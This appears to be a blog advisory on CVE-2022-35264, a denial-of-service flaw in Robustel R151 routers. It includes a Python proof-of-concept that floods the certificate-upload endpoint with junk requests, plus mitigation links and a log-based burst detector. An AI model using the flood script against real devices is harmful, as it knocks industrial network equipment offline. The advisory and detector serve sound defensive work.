A serious Denial of Service (DoS) vulnerability has been found in the Robustel R151 industrial router, impacting firmware versions 3.1.16 and 3.3.. This issue, identified as CVE-2022-35264, affects the web server’s hashFirst functionality, specifically through the /action/import_aaa_cert_file/ API route. In simple terms, a remote attacker can crash the device, interrupting internet connectivity, by sending a specially crafted HTTP request to the router.

This post will break down what the vulnerability is, how it works, and provide example code to help you understand the risk. We’ll also share original references and advice on protecting your devices.

What Is the Vulnerability?

Robustel R151 routers are widely used in industries for remote connectivity. The /action/import_aaa_cert_file/ endpoint lets users upload authentication certificates. But due to poor input handling in the firmware’s hashFirst process, an attacker can send crafted data that overwhelms the router and causes it to crash or become unresponsive.

Denial of Service (DoS):  
After receiving multiple malicious requests, the device's web server crashes. This forces a reboot or a manual reset, resulting in downtime and disconnection from the network.

- Vulnerable Firmware: 3.1.16 and 3.3.
- Vulnerable API: /action/import_aaa_cert_file/
- Type: Denial of Service via hashFirst in the web server

The problem is tied to how the web server processes file uploads on the endpoint. The hashFirst functionality fails to validate input correctly. When attacked, the server cannot handle the malformed requests and stops responding.

Proof-of-Concept (PoC) Exploit

WARNING:  
This is for educational purposes only! Do not attack any device you don't own or have permission to test.

Here’s a simple Python code snippet to demonstrate the issue. This script will repeatedly POST junk data to the vulnerable endpoint.

```python
import requests

# Placeholder: address of a device you own or are authorized to test.
target = 'http://<ROUTER-IP>'
endpoint = '/action/import_aaa_cert_file/'
url = target + endpoint

# Large junk payload to stress the server.
data = {
    'imported_file': ('dos_attack.cert', b'A' * 4096)
}

# No Content-Type header is set by hand: requests builds the
# multipart/form-data header (including its boundary) from files=.

for i in range(100):
    print(f"Sending request {i+1}")
    try:
        requests.post(url, files=data, timeout=2)
    except Exception as e:
        # A timeout or connection error here means the web server stopped answering.
        print(f"Request failed: {e}")
        break

print("Attack finished. Check if device is responsive.")
```

This script sends 100 requests in a loop. If the router is unpatched, its web interface will likely become unresponsive after fewer than 100 attempts.

Affected devices require a physical power cycle to recover, causing operational downtime.

Industries affected: Any user of R151 routers, especially in manufacturing, transport, utilities, and other sectors relying on remote or industrial internet access.

- National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2022-35264
- Original Advisory (Packet Storm): https://packetstormsecurity.com/files/168376/Robustel-R151-3.1.16-3.3.-Denial-Of-Service.html
- Firmware Download/Support: https://www.robustel.com/en/support/firmwares/

Disable Unneeded APIs:

If possible, restrict access to the /action/import_aaa_cert_file/ endpoint.
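Where the endpoint cannot be blocked outright, the request burst described above can be detected from access logs. The following is an added example, not part of the original advisory or vendor code: it assumes a reverse proxy or HTTP-aware sensor in front of the router that writes common/combined log format, and the window and threshold values are assumptions to tune for your environment.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

ENDPOINT = "/action/import_aaa_cert_file/"  # route named in the advisory
WINDOW = timedelta(seconds=10)              # assumed detection window
THRESHOLD = 5                               # assumed max POSTs per source per window

# Common/combined log format: ip - - [time] "METHOD path proto" status size
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}|-)'
)

def find_bursts(lines, window=WINDOW, threshold=THRESHOLD):
    """Return {source_ip: time_of_first_alert} for sources exceeding the threshold."""
    recent = defaultdict(deque)  # ip -> timestamps of matching POSTs inside the window
    alerts = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue  # skip malformed lines and non-upload requests
        # Ignore any query string and tolerate a missing trailing slash.
        path = m["path"].split("?", 1)[0].rstrip("/") + "/"
        if path != ENDPOINT:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        q = recent[m["ip"]]
        q.append(ts)
        while ts - q[0] > window:  # drop timestamps that fell out of the window
            q.popleft()
        if len(q) > threshold and m["ip"] not in alerts:
            alerts[m["ip"]] = ts
    return alerts

def _line(ip, sec, method="POST", path=ENDPOINT):
    return f'{ip} - - [25/Oct/2022:17:15:{sec:02d} +0000] "{method} {path} HTTP/1.1" 200 0'

# Constructed sample log using documentation address ranges, not real traffic.
SAMPLE_LOG = (
    [_line("198.51.100.7", s) for s in range(8)]          # 8 uploads in 8 seconds
    + [_line("192.0.2.10", 0), _line("192.0.2.10", 30)]   # occasional admin upload
    + [_line("203.0.113.5", s, method="GET", path="/") for s in range(20)]
)

if __name__ == "__main__":
    for ip, when in find_bursts(SAMPLE_LOG).items():
        print(f"ALERT {ip}: more than {THRESHOLD} POSTs to {ENDPOINT} within {WINDOW} at {when}")
```

Certificate imports are rare administrative actions, so on most deployments a very low threshold (or alerting on any POST from outside the management network) is reasonable.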

Conclusion

*CVE-2022-35264* is a real danger to networks running Robustel R151 routers. The flaw in the /action/import_aaa_cert_file/ functionality allows even non-technical attackers to easily knock devices offline. Fixes and mitigations are available, so it’s critical to patch your devices and restrict unknown network access as soon as possible.

Stay safe and keep your infrastructure up to date!

Timeline

Published on: 10/25/2022 17:15:00 UTC
Last modified on: 04/26/2023 19:16:00 UTC